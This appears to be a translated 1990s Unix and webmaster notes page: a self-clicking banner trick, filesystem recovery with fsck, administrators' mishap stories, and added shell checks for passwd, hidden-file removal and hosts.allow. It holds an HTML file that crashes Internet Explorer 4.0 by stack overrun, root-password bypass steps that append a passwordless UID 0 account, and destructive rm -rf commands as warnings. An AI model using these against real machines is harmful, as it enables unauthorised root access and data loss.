e_club >tets

Self-clicking message

> There was an idea to send it a message when the mouse is moved over the banner.
> (When a banner is interesting, people often move the cursor to it.)
> But somehow I couldn't figure out how to implement this without a hidden frame.

In the rules you state that the _standard code_ of your network contains:

When the client _crosses_ your one-pixel strip with the mouse from below, there will be an auto-click, and so as not to bother the client, let your http://koshelev.ru/cgi-bin/bannerOver return code 204 No Content, i.e. _do not follow_ the link but stay on the old page.

A link that is followed automatically

It is enough to move the mouse over this link, and the browser will follow it, without a click.

Simple exploits

MSIE 4.0, 4.01 can be crashed with a little help of the <EMBED> tag.

    <EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>

opens a dialog box and closes IE 4.0. The long file extension causes a stack overrun.

--------cut here and save as crashmsie.html---------------------
Trying to crash IE 4.0
<EMBED SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
40 80 160 170 180 190 200
</HTML>
---------------------------------------------------------------

Closing directories to external clients

Create in the directory a file named .htaccess with the following contents:

    order deny,allow
    deny from all
    allow from polimos.ras.ru localhost
    AuthType Basic
    AuthName lenta.ru
    AuthUserFile /home/www/passwd
    # moshkow:1HrhNpfYnwTau  standard crypt()
    require valid-user

See also

Konstantin Okrainec. An HTML textbook from Dubna: http://sundg0.jinr.dubna.su/wguide/
Frames and other additions that appeared in HTML 2.0 and HTML 3: ../WEBMASTER/html20new.txt
Repairing damaged file systems

Practically the only remedy for file system damage on all Unixes is the fsck utility. If it does not cure the damage, your case is almost hopeless. I would recommend the morgue, but enthusiasts can still twitch a little longer.

* LINUX *

Note: the commands given in the examples should be run only after carefully weighing the possible consequences. For that reason the real names of the hard-disk partition special files are replaced in the examples by /dev/hd-name (in real life these are /dev/hda2, /dev/hdb3, /dev/sda1 ...).

Fine-tuning the fs

tune2fs lets you change the tunable parameters of the file system: -c max-mount-counts, -m reserved-blocks-percentage, and so on.

    tune2fs -m 1 /dev/hd-name
    # will find you another 50 MB of free space,
    # and will let you cause catastrophic fragmentation
    # on the remaining scrap of free space

Standard treatment of a file system:

    fsck -y -c -f /dev/hd-name

Forced treatment with checking and "replacement" of bad blocks:

    fsck -y -c -f /dev/hd-name
    # -y  non-interactive treatment, "yes" to every question
    # -c  find bad blocks with a read-only test and move them into the bad-block inode
    # -f  force the check (ignore the "fs is clean" flag)

If the primary superblock is dead, add the option -b 8193 or -b 16385 ... to point at a backup copy. The numbers of the backup superblocks are reported by the newfs utility when the partition is formatted. (You did save its listing, of course?)

The commands tune2fs -l and dumpe2fs can print the layout of the fs service structures and the superblock parameters:

    tune2fs -l /dev/hd-name
    dumpe2fs /dev/hd-name

If _all_ copies of the superblock are dead, the last chance is mke2fs -S: write _only_ the superblock structures and the group descriptors, without touching the data itself.

    mke2fs -S /dev/hd-name   # Write superblock and group descriptors only
    fsck -y /dev/hd-name     # run fsck immediately afterwards

And even that is not yet the end.
For the strong in spirit there remains the file system debugger debugfs:

    man debugfs

What to do in an emergency

Naturally, you will be safer if you boot into single-user mode. To do that, catch the LILO prompt at boot (Left-Alt) and add the parameter single to the boot command:

    Lilo: linux single

You can get into Linux single-user mode only if you know the root password. Without the password, boot like this:

    Lilo: linux init=/bin/sh

or even like this (if a rescue floppy with a unix file system has been prepared):

    Lilo: linux init=/bin/sh root=/dev/fd0H1440

Remount the root partition from read-only to read-write:

    mount -t ext2 -n -o remount,rw /dev/hd-root /

Mount a damaged fs using an alternate superblock:

    mount -t ext2 -o sb=8193,nocheck /dev/hd-name /mntname

Details (you will laugh):

    man mount

Maksim Moshkov. Stories from the life of a Unix administrator, or Rakes

Story 1, with a happy ending. A corrupted /etc/passwd

> A comrade (not me :), this is from Komi) decided to give his root /bin/ksh instead of the proper
> /sbin/sh.
> For that he edited /etc/passwd, but unsuccessfully: he made a mistake and assigned
> /sbin/ksh.
> They tried:
> $ su root -c /sbin/sh
> It didn't help. Now he is weeping bitterly and calling for a hacker.
> Can you help, or is it the stern: reinstall unix?

We have been through this. A classic. First and foremost: "never, NEVER change the superuser's shell..." :-)

0. You can still start a shell as root:

    su root -m -s /bin/sh

But if the password has been forgotten as well, then booting into single user mode or booting from CD/floppy/tape will help.

1. Run df, look up the minor/major of the device that the root is mounted on, then read the manual for the command

    mknod    # mkdev, mknode, mksf - create a special file
             # or whatever else it is called

and write down on a piece of paper the command that creates the special file /dev/root (or wherever "/" is mounted from).

2. Boot from the installation tape/floppy/CD.
and, where it branches into install/update/system maintenance, choose "system maintenance" (it is nothing more than a root shell).

What remains is to mount /dev/root on /mnt and edit /mnt/etc/passwd.

Ambush No. 1

Right after the mini-system boots, there are no special files corresponding to the hard disk (!). Make one by hand: the mknode command is already written down on the piece of paper.

Ambush No. 2

The vi editor will not start (no terminfo). Well, to hell with it. You will think of something. For example:

    echo "toor::0:0:Yet another Super-User:/:" >> /mnt/etc/passwd
                                             ^^^^^^
    note that it is >> and not > (guess why :-)

or you can do it like this:

    PATH=$PATH:/mnt/bin:/mnt/usr/bin
    export PATH
    TERMINFO=/mnt/usr/lib/terminfo   # or wherever it is
    export TERMINFO

In short: practise at home, and then write to Komi with the exact names of the files and commands, because I am afraid an untrained admin may miss a couple of times, and here you must not miss.

Appendix: Bypassing the root password on Motorola Unix SVR4/88.

1. Look up the major/minor for / and /usr:

    104 0 /dev/root
    104 3 /dev/dsk/m197_c0d0s3

2. Boot from tape, go to maintenance.

3. Mount the disk partitions corresponding to / and /usr, repairing the file system first (since the system was shut down uncleanly for lack of the root password).

    mkdir /mnt
    mknod /dev/rootn b 104 0
    /etc/fs/ufs/fsck /dev/rootn
    mount -F ufs /dev/rootn /mnt

likewise for /usr:

    mknod /dev/usr3 b 104 3
    /etc/fs/ufs/fsck /dev/usr3
    mount -F ufs /dev/usr3 /mnt/usr

4. Edit /etc/passwd, making a passwordless root:

    echo "toor::0:1:Adm:/:/sbin/sh" >> /mnt/etc/passwd

5. Change the root directory for root (it will be /mnt):

    chroot /mnt /sbin/sh

6. Update shadow:

    pwconv

That is all.

Story 2, almost about the same thing. A corrupted /etc/fstab

Date: 20 Apr 1997
From: Bernshtam Pavel (barnshte@CS.bgu.ac.il)

It happened to me too: I messed up /etc/fstab and rebooted without noticing the mistake - bang - it comes up (and this was an Axil with SunOS 4.1) in single user.
I run ls - Command not found - I see, /usr is not mounted. I looked on another Sun at what there is in /sbin, found mount, rejoiced, and did /sbin/mount /usr.

There is vi! I struggled for about half an hour until I got the right TERM set, then started vi. I open fstab - the lines are garbage (there you go: don't work in PICO, learn VI!!!), I fixed it, I save - and the root partition is READ ONLY!!!

I do Stop-A. Thank God, I was advised that in the boot monitor you can do b -rw (mount with write); after that I repeated the whole procedure with mount and vi and fixed /etc/fstab.

Oh... I also forgot: vi would not start until I mounted /var, because /tmp is a link to /var/tmp, and vi does not run without /tmp.

/* and on Linux there is a special command to remount read-write; it can be run from single-user mode:
   mount -n -o remount /
*/

The rm -rf command on SCO

Because the pattern ".*" matches the directory "..", NEVER RUN THE COMMAND

    rm -r .*

(Most unixes forgive this mistake, but NOT ALL.)

From: Pavel Severov

"... I decided to clear a little free disk space on our SCO server with the Oracle database..."

    # cd /usr/tmp
    # rm -rf *

I look, and all sorts of junk is still there, /usr/tmp/.X11-0 and so on. So then I

    # rm -rf .*
    # OOPS!
    # du
    ldd: Can not open file
    # df
    ldd: Can not open file
    # ls -al
    ldd: Can not open file

. . .

This story has a sad ending. You have already guessed that /usr/tmp/.* includes /usr/tmp/.. After the reboot the machine, not finding the /usr directory, never came back to life.

Remote access, or "The spare key to the safe is kept in the safe"

A fine thing, Unix + TCP/IP: you can configure a machine in the back of beyond without getting up from your desk, or even leaving home.

Story 1.

So once I was changing either the IP address or the routing on a remote machine... In short, I slipped and said

    ifconfig eth0 down

And that was that. There was no one left to say ifconfig eth0 NEW-IP.
You have of course guessed that it _SHOULD HAVE BEEN_ written on one line:

    ifconfig eth0 down ; ifconfig eth0 NEW-IP up ; route add ...

Story 2.

I wanted to raise the level of security. We write in /etc/hosts.deny

    ALL:ALL

and in /etc/hosts.allow

    ALL:193.263.12.13
            ^^^

Seemingly a small mistake, just swap the digits, but I can't: I had already logged out.

Remote "access", or "There is no key at all"

Once our server hung; someone had to press reset and reboot it, but the room was locked and the keys had already been taken away. And you can't get in by telnet either: there is nothing to get into. We cut the power to the whole floor, switched it back on - voila!

A new /lib/libc.so: upgrading LIB C

Linux. The year 1993. LibC had to be replaced. Well, off we go, nothing to it: move the old one aside, put the new one in its place.

    cd lib
    mv libc.so libc.so-old
    mv libc.so-new libc.so
    ldd: Can not execute, shared library not found

Finish. I had to boot from a floppy and mount the hd. But, funny as it is, the next time the same commands written on one line worked. Or maybe the library happened to be in the cache... Dark are the waters in Linux.

Incidentally, the files in the /sbin directory are usually statically linked; they do not need the shared libc in order to work.

Story 1. Trusted mode: security above all

On HP-UX novice administrators love to play with sam: a GUI, a mouse interface, administer to your heart's content. Only you have to read the messages, and they are all in English. Very easily, with a single "Ok", SAM switches the system into trusted mode. They switch it on and don't notice. They notice a couple of days later, when they fail to guess the root password in three tries. In trusted mode the login is then blocked completely, and it does not occur to them to create another user BEFORE THAT.

As always, single user mode will save us: interrupt the boot at the IPL prompt and then

    IPL> hpux -is

Then start sam and convert the system back to "untrusted":

    # mount -a
    # sam

But if you have also managed to enable a boot password, then you are on your own.

Story 2. Security class C2: the same thing, but on SCO

Security class C2 means heightened security. And heightened headaches for the users. And for the administrator too.

We once had to dial in by modem from Moscow to a protected SCO machine in St. Petersburg. We could not match the getty speed on the first try, 6-bit garbage broke through at the login, and after the third attempt, instead of the getty Login, we saw "Intruder attempts, tty line /dev/modem disabled".

A couple of weeks later the owner of the machine returned to St. Petersburg and brought getty back.

The screen saver and the Enter key

When the screen saver blanks the screen, what do you press? I don't know about others, but I press the CTRL key.

An acquaintance of mine decided to clean out the /tmp directory. As root. He types rm -rf /tmp/*, or rather wants to type it, because at the moment of rm -rf /_ the phone rings and he is called away somewhere.

An hour later he came back, saw the blanked screen, and pressed _his_ favourite key. Guess which one?
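
The /etc/passwd stories above leave behind exactly the state an administrator later has to look for: a second UID 0 account such as toor, an empty password field, or a superuser shell that does not exist. The following check is an added example, not part of the original page; the function name audit_passwd and its optional ROOTDIR argument are made up for illustration.

```sh
#!/bin/sh
# Added example: audit a passwd file for the conditions in the stories above.
# audit_passwd FILE [ROOTDIR]
#   FILE     passwd-format file to read
#   ROOTDIR  optional prefix for shell paths (e.g. /mnt for a mounted disk)
# Prints one finding per line; returns 1 if there were any, else 0.
audit_passwd() {
    ap_file=$1
    ap_root=${2:-}
    ap_rc=0
    while IFS=: read -r name pw uid gid gecos home shell; do
        case $name in
            ''|'#'*) continue ;;      # blank lines and comments
        esac
        # Any second account with UID 0 is a full superuser.
        if [ "$uid" = 0 ] && [ "$name" != root ]; then
            echo "$name: extra UID 0 account"
            ap_rc=1
        fi
        # An empty second field means login without a password.
        if [ -z "$pw" ]; then
            echo "$name: empty password field"
            ap_rc=1
        fi
        # A superuser whose shell cannot be executed cannot log in or su.
        if [ "$uid" = 0 ] && [ -n "$shell" ] && [ ! -x "$ap_root$shell" ]; then
            echo "$name: shell $shell is missing or not executable"
            ap_rc=1
        fi
    done < "$ap_file"
    return "$ap_rc"
}
```

Running it against /mnt/etc/passwd with ROOTDIR set to /mnt, before leaving the maintenance shell, checks the edited file against the disk it will actually boot from.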
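
The rm -rf .* story above turns on what the shell expands ".*" to. The following functions are an added example, not part of the original page: they select hidden entries with two patterns that can never expand to "." or "..", and report whether the running shell's own ".*" would include the parent directory. The function names are made up for illustration.

```sh
#!/bin/sh
# Added example: hidden-file cleanup that cannot reach the parent directory.
# Function names are illustrative; try it on a scratch directory first.

# Print the hidden entries of directory $1, one per line.
#   .[!.]*  a dot followed by a non-dot character       (.X11-0)
#   ..?*    two dots followed by at least one character  (..odd)
# Neither pattern can expand to "." or "..".
hidden_entries() {
    ( cd "$1" || exit 1
      for f in .[!.]* ..?*; do
          # A pattern that matches nothing is left as literal text: skip it.
          [ -e "$f" ] || [ -L "$f" ] || continue
          printf '%s\n' "$f"
      done )
}

# Return 0 if this shell expands ".*" in directory $1 to include "..".
# The answer differs between shells and shell versions.
dotstar_matches_parent() {
    ( cd "$1" || exit 2
      for f in .*; do
          if [ "$f" = ".." ]; then exit 0; fi
      done
      exit 1 )
}

# Remove the hidden entries of directory $1 and nothing outside it.
remove_hidden() {
    ( cd "$1" || exit 1
      for f in .[!.]* ..?*; do
          [ -e "$f" ] || [ -L "$f" ] || continue
          rm -rf -- "./$f"
      done )
}
```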
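
For the hosts.allow story above, a check that can be run before logging out. This is an added example, not part of the original page: check_allow is a made-up name, and the client address 193.236.12.13 used when trying it out is an assumption about what the author meant to type. It understands only ALL, exact IPv4 addresses and prefixes ending in a dot.

```sh
#!/bin/sh
# Added example: check a hosts.allow draft before closing the session.
# check_allow FILE MY_IP
#   exit 0  a rule matches MY_IP and no malformed IPv4 address was found
#   exit 1  otherwise; the reasons are printed
# Handles ALL, exact IPv4 addresses and prefixes ending in "." only;
# hostnames, net/mask pairs, EXCEPT and IPv6 are outside this check.
check_allow() {
    awk -v me="$2" '
    # True for a dotted quad with an octet above 255.
    function bad_ip(tok,    n, o, i) {
        if (tok !~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) return 0
        n = split(tok, o, ".")
        for (i = 1; i <= n; i++) if (o[i] + 0 > 255) return 1
        return 0
    }
    /^[ \t]*(#|$)/ { next }          # comments and blank lines
    {
        if (split($0, field, ":") < 2) next
        gsub(/,/, " ", field[2])     # clients may be comma separated
        m = split(field[2], client, " ")
        for (i = 1; i <= m; i++) {
            c = client[i]
            if (bad_ip(c)) {
                printf "line %d: invalid address %s\n", NR, c
                bad = 1
            } else if (c == "ALL" || c == me) {
                ok = 1
            } else if (c ~ /\.$/ && index(me, c) == 1) {
                ok = 1               # prefix pattern such as 193.236.
            }
        }
    }
    END {
        if (!ok) print "no rule matches " me
        exit (bad || !ok)
    }' "$1"
}
```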